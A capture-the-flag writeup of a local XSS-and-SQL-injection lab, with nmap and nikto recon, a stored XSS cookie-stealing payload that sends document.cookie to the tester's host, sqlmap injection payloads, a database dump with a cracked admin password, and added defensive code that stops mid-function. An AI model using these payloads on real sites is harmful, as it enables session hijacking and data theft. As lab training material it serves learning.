WriteUp VulnHub : XSS_SQL

SaxHornet
17 min read, Mar 20, 2018

Introduction

I'm writing this post first to learn web pentesting in depth, and second for the pleasure of hacking ;)

So today I'm going to explain this challenge. It is quite different from my last writeup (HackTheBox): the machine is not online, but runs on my local machine.

Let’s roll ;)

The Architecture

I've got two machines: the first is my Debian box for the penetration test, and the second is the VM of the challenge, which I configured with DHCP on my network.

Scenario

This exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator’s cookies. Then how you can use his/her session to gain access to the administration to find a SQL injection and gain code execution using it. — From https://pentesterlab.com/exercises/xss_and_mysql_file

Reconnaissance

The first thing we are going to do is to find our machine on the Lab network.

sudo netdiscover -r 192.168.0.0/24 -p

The IP address of the LAN

I know my own IP addresses, so the CTF VM is at 192.168.0.28.

Well, the next step is to list the ports and services of the machine.

nmap 192.168.0.28 -oX xss_mysql.xml

Starting Nmap 7.40 ( https://nmap.org ) at 2018-03-19 17:46 CET
Nmap scan report for 192.168.0.28
Host is up (0.00039s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:49:8D:69 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.93 seconds

Then I looked up the versions of both services. I used Metasploit for more clarity and imported the Nmap results into MSF.

msf > db_nmap -sV 192.168.0.28
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2018-03-19 18:02 CET
[*] Nmap: Nmap scan report for 192.168.0.28
[*] Nmap: Host is up (0.00034s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze4 (protocol 2.0)
[*] Nmap: 80/tcp open http Apache httpd 2.2.16 ((Debian))
[*] Nmap: MAC Address: 00:0C:29:49:8D:69 (VMware)
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 14.29 seconds

msf > services

Services
========

host          port  proto  name  state  info
----          ----  -----  ----  -----  ----
192.168.0.28  80    tcp    http  open   Apache httpd 2.2.16 (Debian)
192.168.0.28  22    tcp    ssh   open   OpenSSH 5.5p1 Debian 6+squeeze4 protocol 2.0

msf > hosts

Hosts
=====

address       mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------       ---                ----  -------  ---------  -----  -------  ----  --------
192.168.0.28  00:0c:29:49:8d:69        Linux    2.6.X             server

We can see two services on the VM: a web server running Apache 2.2.16 and remote access over SSH. The host is Linux.

Let's look at each service we found.

The web page access
The SSH access

We have enough information to continue. Our intrusion vector is the website: the system itself could be one too, but this CTF is about web weaknesses, so we are going in through the web.

Weakness

With all the information we have, we can look for vulnerabilities.

root@Debian:/home/user/Documents/pentesting/PentesterLab# nikto -h 192.168.0.28 -o vulns.xml
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.0.28
+ Target Hostname: 192.168.0.28
+ Target Port: 80
+ Start Time: 2018-03-19 18:12:48 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.3-7+squeeze18
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 7239, size: 14634, mtime: Thu Oct 10 09:47:14 2013
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.0.1/images/".
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Admin login page/section found.
+ 8346 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time: 2018-03-19 18:13:01 (GMT1) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The interesting findings are underlined for visibility. For example, the session cookie is created without the httponly flag, and the X-XSS-Protection header is not set. These elements suggest we could be facing an XSS vulnerability.
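The two Nikto findings that matter most for what follows are the cookie without HttpOnly and the missing browser-side headers. The check below is an added example (not part of the writeup and not a Nikto module): it parses a raw HTTP response and reports exactly those weaknesses, then shows the hardened header set next to it. Both responses are constructed for the example; the session cookie value is the one shown later in this writeup. X-XSS-Protection is checked by Nikto but is deprecated in current browsers, so the audit asks for Content-Security-Policy instead.

```python
import re

# Constructed response modelled on the Nikto findings above (not a real capture).
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.16 (Debian)\r\n"
    "X-Powered-By: PHP/5.3.3-7+squeeze18\r\n"
    "Set-Cookie: PHPSESSID=lvaareppkskktdg09g09e2dtm4; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)

# The same response with the cookie flags and headers a defender would set (constructed).
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: PHPSESSID=lvaareppkskktdg09g09e2dtm4; path=/; HttpOnly; Secure; SameSite=Lax\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Content-Security-Policy: default-src 'self'\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html>...</html>"
)

REQUIRED_HEADERS = ("x-frame-options", "x-content-type-options", "content-security-policy")


def parse_headers(raw):
    """Return [(name_lowercase, value)] for the header block of a raw response."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def audit_response(raw):
    """List the weaknesses found in one response; an empty list means it passed."""
    headers = parse_headers(raw)
    present = {name for name, _ in headers}
    findings = []
    for name, value in headers:
        if name == "set-cookie":
            cookie = value.split(";")[0].split("=")[0]
            attrs = {a.strip().split("=")[0].lower() for a in value.split(";")[1:]}
            if "httponly" not in attrs:
                findings.append(f"cookie {cookie} lacks HttpOnly (readable via document.cookie)")
            if "secure" not in attrs:
                findings.append(f"cookie {cookie} lacks Secure")
            if "samesite" not in attrs:
                findings.append(f"cookie {cookie} lacks SameSite")
        elif name in ("server", "x-powered-by") and re.search(r"\d", value):
            findings.append(f"{name} header leaks a version: {value}")
    for required in REQUIRED_HEADERS:
        if required not in present:
            findings.append(f"missing {required}")
    return findings


if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(resp) or "no findings")
```

The HttpOnly finding is the one that enables the next section: the stored-XSS payload shown later reads `document.cookie`, and a session cookie flagged HttpOnly is simply not exposed to script, so the same payload would exfiltrate nothing useful.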

The next step is to verify it, to be really sure.

To do that, we browse the website, leave a comment containing the code below and see what happens. If a pop-up with the message "XSS detected" appears, we are indeed facing an XSS vulnerability.

The detection

<script>alert('XSS detected')</script>

Let’s do it ;)

The check of the XSS weakness

So we are indeed facing an XSS vulnerability.

Exploitation

Now that we have found the entry point, we are going to exploit it. The approach is to leave a comment on the website that steals the admin's cookie; we can then use it to elevate our privileges.

Let’s do it !

Above is the payload used to steal the admin cookie: a persistent (stored) XSS whose request we redirect to our local web server (socat).

Our local webserver and the cookie stealer

Next, the admin cookie shows up on our screen!!!

Admin cookie

Then we have to put the session cookie into our browser. I used the standard tool in Firefox.

Editing the admin cookie
The admin page in “normal”
We are admin without password !

We are admin of the website without any password; cool, isn't it?
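The comment-based detection and the cookie theft above both work for one reason: the blog writes comment text into the page unescaped. The added example below (not the challenge's PHP code) renders the same comments through a vulnerable template and a hardened one, and adds a scan that flags already-stored payloads in a comments table. The rows are constructed from the comment texts this writeup shows; the HTML template and field names are assumptions.

```python
import html
import re

# Constructed rows modelled on the blog's comments table (texts taken from this writeup).
COMMENTS = [
    {"id": 1, "title": "shell", "text": "<script>alert('XSS vulnerability')</script>"},
    {"id": 2, "title": "Test", "text": "<script>alert('Xss detected')</script>"},
    {"id": 5, "title": "shell",
     "text": "<script>document.write('<img src=\"http://192.168.0.22/?'+document.cookie+' \"/>');</script>"},
    {"id": 10, "title": "Nice", "text": "Love the new design :)"},
]

SCRIPT_TAG = re.compile(r"<\s*script\b", re.I)


def render_unsafe(comment):
    """Vulnerable: user-controlled fields are pasted straight into the HTML."""
    return "<div class='comment'><b>%s</b><p>%s</p></div>" % (comment["title"], comment["text"])


def render_safe(comment):
    """Hardened: every user-controlled value is HTML-escaped at output time."""
    return "<div class='comment'><b>%s</b><p>%s</p></div>" % (
        html.escape(comment["title"]),
        html.escape(comment["text"]),
    )


def contains_active_markup(rendered):
    """True if the rendered fragment still carries a live <script> tag."""
    return bool(SCRIPT_TAG.search(rendered))


# Indicators of stored XSS or cookie exfiltration in persisted content.
INDICATORS = [
    ("script tag", SCRIPT_TAG),
    ("event handler", re.compile(r"\bon\w+\s*=", re.I)),
    ("cookie access", re.compile(r"document\.cookie", re.I)),
    ("external fetch", re.compile(r"https?://", re.I)),
]


def flag_comments(rows):
    """Return [(id, [indicator names])] for every row that looks like a planted payload."""
    suspicious = []
    for row in rows:
        hits = [name for name, rx in INDICATORS if rx.search(row["text"])]
        if hits:
            suspicious.append((row["id"], hits))
    return suspicious


if __name__ == "__main__":
    for c in COMMENTS:
        print(c["id"], "unsafe executes:", contains_active_markup(render_unsafe(c)),
              "| safe executes:", contains_active_markup(render_safe(c)))
    print(flag_comments(COMMENTS))
```

Escaping on output is the fix for the bug itself; the scan is the clean-up step, because a stored XSS keeps firing for every visitor until the offending rows are removed. Together with an HttpOnly session cookie (the Nikto finding earlier), the `document.cookie` payload in row 5 would neither render nor have anything to read.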

What can we do by now ?

We are going to browse the web page with our new privileges and see if we can find another weakness.

We found that we can add a comment with the admin role. We just want to test whether we can find an SQLi! This could allow us to get the website's password.

SQLi detection

The id=1 appears to be vulnerable. Let’s confirm it.

Leave a comment

The test consists of adding a comma to the parameter and checking whether an error comes back, which indicates it is vulnerable.

The test

Bingo!! We get an error which gives us the database (MySQL) and the path (/var/www/classes/), which is useful for the LOAD_FILE() function.
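What the comma test exercises is an `id` parameter concatenated into the SQL text, and what sqlmap later automates is the boolean-based blind probe (`id=1 AND 9807=9807` versus a false condition). The added example below reproduces that flaw and its fix in miniature with Python's sqlite3 as a stand-in for MySQL; it is not the challenge's PHP code. The schema mirrors the dumped `posts` table and the rows are constructed from the dump.

```python
import sqlite3


def make_db():
    """In-memory copy of the blog's posts table, rows constructed from the dump."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, text TEXT, published TEXT)"
    )
    conn.executemany("INSERT INTO posts (id, title, text) VALUES (?, ?, ?)", [
        (1, "Welcome", "Welcome to my blog. Leave a comment if you like the new design :)"),
        (2, "Test", "Is it working?"),
    ])
    return conn


def get_post_vulnerable(conn, post_id):
    """Vulnerable: the request parameter becomes part of the SQL text."""
    sql = "SELECT id, title, text FROM posts WHERE id=" + post_id
    return conn.execute(sql).fetchall()


def get_post_safe(conn, post_id):
    """Hardened: validate the type first, then bind the value as a parameter."""
    if not post_id.isdigit():
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title, text FROM posts WHERE id=?"
    return conn.execute(sql, (int(post_id),)).fetchall()


def probe(conn, fetch, post_id):
    """What a tester observes for one value: ('ok', rows) or ('error', message)."""
    try:
        return ("ok", fetch(conn, post_id))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    for value in ("1", "1,", "1 AND 9807=9807", "1 AND 9807=9808"):
        print("vulnerable", repr(value), probe(conn, get_post_vulnerable, value))
        print("safe      ", repr(value), probe(conn, get_post_safe, value))
```

The vulnerable function answers the comma with a syntax error (the page's detection signal) and answers the two AND probes with one row versus none (the blind oracle sqlmap uses). The safe function rejects anything that is not an integer before the database ever sees it, and binds the integer rather than formatting it in, so neither the error nor the oracle exists.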

Exploitation

The last step is to exploit this new vulnerability. To do that, we are going to use sqlmap. So, ready, go!!

We need the IP address and the admin cookie we stole before.

In this challenge, I re-stole the cookie because I had some problems…

My new cookie

sqlmap -u 192.168.0.28/admin/edit.php?id=1 --cookie PHPSESSID=lvaareppkskktdg09g09e2dtm4
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.2#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:39:54

[16:39:54] [INFO] testing connection to the target URL
[16:39:55] [INFO] heuristics detected web page charset 'ascii'
[16:39:55] [INFO] testing if the target URL is stable
[16:39:56] [INFO] target URL is stable
[16:39:56] [INFO] testing if GET parameter 'id' is dynamic
[16:39:56] [INFO] confirming that GET parameter 'id' is dynamic
[16:39:56] [INFO] GET parameter 'id' is dynamic
[16:39:56] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[16:39:56] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[16:40:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:40:04] [WARNING] reflective value(s) found and filtering out
[16:40:04] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:40:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[16:40:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[16:40:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[16:40:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[16:40:04] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[16:40:04] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'
[16:40:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:40:04] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:40:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:40:04] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:40:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:40:04] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:40:04] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:40:04] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)'
[16:40:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[16:40:04] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:40:04] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[16:40:04] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[16:40:04] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[16:40:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[16:40:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[16:40:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[16:40:04] [INFO] testing 'MySQL inline queries'
[16:40:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[16:40:04] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:40:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[16:40:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[16:40:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[16:40:04] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[16:40:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[16:40:14] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[16:40:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[16:40:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[16:40:14] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[16:40:14] [INFO] target URL appears to have 4 columns in query
[16:40:14] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[16:40:14] [WARNING] parameter length constrainting mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 56 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9807=9807

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-4152 UNION ALL SELECT NULL,NULL,CONCAT(0x71787a7871,0x506a6c634672744444686b454d7041426d506978674a477451655567744c55734762697041445572,0x7178707671),NULL-- tADo
---
[16:40:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.12
[16:40:18] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.28'

[*] shutting down at 16:40:18

The underlined output shows that we are facing a blind SQLi.

The next step is to dump the database, using sqlmap's --dump option.

root@Debian:/home/user/Documents/pentesting/tools/web/xsser_1.7-1/xsser-public# sqlmap -u 192.168.0.28/admin/edit.php?id=1 --cookie PHPSESSID=lvaareppkskktdg09g09e2dtm4 --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:42:41

[16:42:41] [INFO] resuming back-end DBMS 'mysql'
[16:42:41] [INFO] testing connection to the target URL
[16:42:41] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 9807=9807

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-4152 UNION ALL SELECT NULL,NULL,CONCAT(0x71787a7871,0x506a6c634672744444686b454d7041426d506978674a477451655567744c55734762697041445572,0x7178707671),NULL-- tADo
---
[16:42:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.12
[16:42:41] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[16:42:41] [INFO] fetching current database
[16:42:41] [WARNING] reflective value(s) found and filtering out
[16:42:41] [INFO] fetching tables for database: 'blog'
[16:42:41] [INFO] the SQL query used returns 3 entries
[16:42:41] [INFO] retrieved: comments
[16:42:41] [INFO] retrieved: posts
[16:42:41] [INFO] retrieved: users
[16:42:41] [INFO] fetching columns for table 'posts' in database 'blog'
[16:42:41] [INFO] the SQL query used returns 4 entries
[16:42:41] [INFO] retrieved: "id","mediumint(9)"
[16:42:41] [INFO] retrieved: "title","varchar(50)"
[16:42:41] [INFO] retrieved: "text","text"
[16:42:41] [INFO] retrieved: "published","datetime"
[16:42:41] [INFO] fetching entries for table 'posts' in database 'blog'
[16:42:41] [INFO] the SQL query used returns 2 entries
[16:42:41] [INFO] retrieved: "1"," ","Welcome to my blog. Leave a comment if you like the new design :) ","Welcome"
[16:42:41] [INFO] retrieved: "2"," ","Is it working?","Test"
[16:42:41] [INFO] analyzing table dump for possible password hashes
Database: blog
Table: posts
[2 entries]
+----+-------------------------------------------------------------------+---------+-----------+
| id | text                                                              | title   | published |
+----+-------------------------------------------------------------------+---------+-----------+
| 1  | Welcome to my blog. Leave a comment if you like the new design :) | Welcome | NULL      |
| 2  | Is it working?                                                    | Test    | NULL      |
+----+-------------------------------------------------------------------+---------+-----------+

[16:42:41] [INFO] table 'blog.posts' dumped to CSV file '/root/.sqlmap/output/192.168.0.28/dump/blog/posts.csv'
[16:42:41] [INFO] fetching columns for table 'users' in database 'blog'
[16:42:41] [INFO] the SQL query used returns 3 entries
[16:42:41] [INFO] retrieved: "id","mediumint(9)"
[16:42:41] [INFO] retrieved: "login","varchar(50)"
[16:42:41] [INFO] retrieved: "password","varchar(50)"
[16:42:41] [INFO] fetching entries for table 'users' in database 'blog'
[16:42:41] [INFO] the SQL query used returns 1 entries
[16:42:41] [INFO] retrieved: "1","admin","8efe310f9ab3efeae8d410a8e0166eb2"
[16:42:41] [INFO] analyzing table dump for possible password hashes
[16:42:41] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:42:46] [INFO] writing hashes to a temporary file '/tmp/sqlmaptC0ZK711833/sqlmaphashes-GIdvz6.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:42:51] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[16:42:56] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[16:43:00] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[16:43:00] [WARNING] multiprocessing hash cracking is currently not supported on this platform
[16:43:04] [INFO] cracked password 'P4ssw0rd' for user 'admin'
[16:43:04] [INFO] postprocessing table dump
Database: blog
Table: users
[1 entry]
+----+-------+---------------------------------------------+
| id | login | password                                    |
+----+-------+---------------------------------------------+
| 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+----+-------+---------------------------------------------+

[16:43:04] [INFO] table 'blog.users' dumped to CSV file '/root/.sqlmap/output/192.168.0.28/dump/blog/users.csv'
[16:43:04] [INFO] fetching columns for table 'comments' in database 'blog'
[16:43:04] [INFO] the SQL query used returns 6 entries
[16:43:04] [INFO] retrieved: "id","mediumint(9)"
[16:43:04] [INFO] retrieved: "title","varchar(50)"
[16:43:04] [INFO] retrieved: "text","text"
[16:43:04] [INFO] retrieved: "author","varchar(50)"
[16:43:04] [INFO] retrieved: "published","datetime"
[16:43:04] [INFO] retrieved: "post_id","mediumint(9)"
[16:43:04] [INFO] fetching entries for table 'comments' in database 'blog'
[16:43:04] [INFO] the SQL query used returns 9 entries
[16:43:04] [INFO] retrieved: "","1","2"," "," <script>alert('XSS vulnerability')</script>","shell"
[16:43:04] [INFO] retrieved: "test","2","1"," ","<script>alert('Xss detected')</script> ","Test"
[16:43:04] [INFO] retrieved: "test","3","1"," "," <script>alert('XSS detected')</script>","Test"
[16:43:04] [INFO] retrieved: "test","4","1"," ","<script>document.cookie</script>","Test"
[16:43:04] [INFO] retrieved: "test","5","1"," "," <script>document.write('<img src="http://192.168.0.22/?'+document.cookie+' "/>');</script>","shell"
[16:43:04] [INFO] retrieved: "test","6","1"," "," <script>document.write('<img src="http://192.168.0.22/?'+document.cookie+' "/>');</script>","shell"
[16:43:04] [INFO] retrieved: "test","7","2"," "," <script>document.write('<img src="http://192.168.0.22/?'+document.cookie+' "/>');</script>","Test"
[16:43:04] [INFO] retrieved: "test","8","2"," "," <script>document.write('<img src="http://192.168.0.22/?'+document.cookie+' "/>');</script>","Test"
[16:43:04] [INFO] retrieved: "test","9","1"," "," <script>document.write('<img src="http://192.168.0.22/?'+document.cookie+' "/>');</script>","shell"
[16:43:04] [INFO] analyzing table dump for possible password hashes
Database: blog
Table: comments
[9 entries]
+----+---------+--------------------------------------------------------------------------------------------+-------+---------+-----------+
| id | post_id | text                                                                                       | title | author  | published |
+----+---------+--------------------------------------------------------------------------------------------+-------+---------+-----------+
| 1  | 2       | <script>alert('XSS vulnerability')</script>                                                | shell | <blank> | NULL      |
| 2  | 1       | <script>alert('Xss detected')</script>                                                     | Test  | test    | NULL      |
| 3  | 1       | <script>alert('XSS detected')</script>                                                     | Test  | test    | NULL      |
| 4  | 1       | <script>document.cookie</script>                                                           | Test  | test    | NULL      |
| 5  | 1       | <script>document.write('<img src="http://192.168.0.22/?'+document.cookie+' "/>');</script> | shell | test    | NULL      |
| 6  | 1       | <script>document.write('<img src="http://192.168.0.22/?'+document.cookie+' "/>');</script> | shell | test    | NULL      |
| 7  | 2       | <script>document.write('<img src="http://192.168.0.22/?'+document.cookie+' "/>');</script> | Test  | test    | NULL      |
| 8  | 2       | <script>document.write('<img src="http://192.168.0.22/?'+document.cookie+' "/>');</script> | Test  | test    | NULL      |
| 9  | 1       | <script>document.write('<img src="http://192.168.0.22/?'+document.cookie+' "/>');</script> | shell | test    | NULL      |
+----+---------+--------------------------------------------------------------------------------------------+-------+---------+-----------+

[16:43:04] [INFO] table 'blog.comments' dumped to CSV file '/root/.sqlmap/output/192.168.0.28/dump/blog/comments.csv'
[16:43:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.0.28'

[*] shutting down at 16:43:04

So we cracked the password stored in the database. Next, we checked it.

Recap of the database credentials
We are in !!
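The reason the dictionary attack finished in a few seconds is visible in the dump: the admin password is stored as a bare, unsalted MD5 digest, so every wordlist entry costs one hash and the same password always produces the same digest. The added example below (not from the writeup or from sqlmap) is the audit a defender would run on such a table, followed by the salted, iterated replacement and a transparent upgrade on the next successful login. The digest is the one shown in the `users` dump above; the wordlist and user row are constructed; the PBKDF2 iteration count follows OWASP's current guidance for PBKDF2-HMAC-SHA256.

```python
import hashlib
import hmac
import os
import re

DUMPED_HASH = "8efe310f9ab3efeae8d410a8e0166eb2"          # from the blog.users dump above
WORDLIST = ["password", "123456", "admin", "P4ssw0rd", "letmein"]  # constructed mini wordlist
ITERATIONS = 600_000                                       # OWASP guidance for PBKDF2-HMAC-SHA256

UNSALTED_MD5 = re.compile(r"^[0-9a-f]{32}$")


def looks_like_unsalted_md5(stored):
    """32 hex characters with no algorithm tag or salt: the legacy format in the dump."""
    return bool(UNSALTED_MD5.match(stored))


def weak_hash_in_wordlist(stored, words):
    """Audit: one MD5 per candidate is all a dictionary attack on this format costs."""
    for word in words:
        if hmac.compare_digest(hashlib.md5(word.encode()).hexdigest(), stored):
            return word
    return None


def hash_password(password, salt=None):
    """Salted, iterated hash; two calls with the same password give different strings."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
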